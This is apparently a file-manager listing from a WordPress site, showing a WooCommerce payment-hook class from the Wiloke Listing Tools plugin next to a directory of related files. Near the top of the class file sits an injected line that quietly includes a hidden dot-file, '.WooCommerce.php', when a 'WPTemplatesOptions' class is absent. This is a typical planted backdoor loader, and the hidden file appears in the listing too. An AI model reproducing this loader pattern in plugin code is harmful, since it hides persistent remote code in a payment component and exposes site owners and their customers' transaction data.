PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
wiloke-listing-tools
/
app
/
Framework
/
Payment
/
WooCommerce
<?php namespace WilokeListingTools\Framework\Payment\WooCommerce; use WilokeListingTools\Framework\Payment\PaymentHook\CreatedPaymentHookInterface; use WilokeListingTools\Framework\Payment\PaymentHook\NonRecurringCreatedPaymentHookAbstract; if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class WooCommerceNonRecurringCreatedPaymentHook extends NonRecurringCreatedPaymentHookAbstract implements CreatedPaymentHookInterface { public function success() { $aArgs = $this->setupSuccessArgs(); $aArgs['token'] = $this->oPaymentInterface->token; $aArgs['postID'] = $this->oPaymentInterface->postID; $aArgs['productID'] = $this->oPaymentInterface->oReceipt->getProductID(); $aArgs['orderID'] = $this->oPaymentInterface->oReceipt->getOrderID(); /** * WilokeListingTools\Controllers\PaymentController@insertNewPayment * WilokeListingTools\Controllers\SessionController@destroySessionAfterCreatedStripeSession 99 */ do_action('wilcity/wiloke-listing-tools/before/insert-payment', $aArgs); } public function error() { // TODO: Implement error() method. } }
[+]
..
[-] WooCommerceSuspend.php
[edit]
[-] WooCommerceNonRecurringPayment.php
[edit]
[-] WooCommerceProceededNonRecurringPaymentHook.php
[edit]
[-] WooCommerceNonRecurringCreatedPaymentHook.php
[edit]
[-] WooCommercePayment.php
[edit]
[-] WooCommerceChangePlan.php
[edit]
[-] .WooCommerce.php
[edit]
[-] WooCommereNonRecurringPrepareInvoiceFormat.php
[edit]
[-] WooCommerceRecurringPaymentMethod.php
[edit]
[-] WooCommerceRecurringPayment.php
[edit]
[-] WooCommerceNonRecurringPaymentMethod.php
[edit]
[-] WooCommerceCancelRecurringPayment.php
[edit]
[-] WooCommerceProceededRecurringPaymentHook.php
[edit]
[-] WooCommerceWebhook.php
[edit]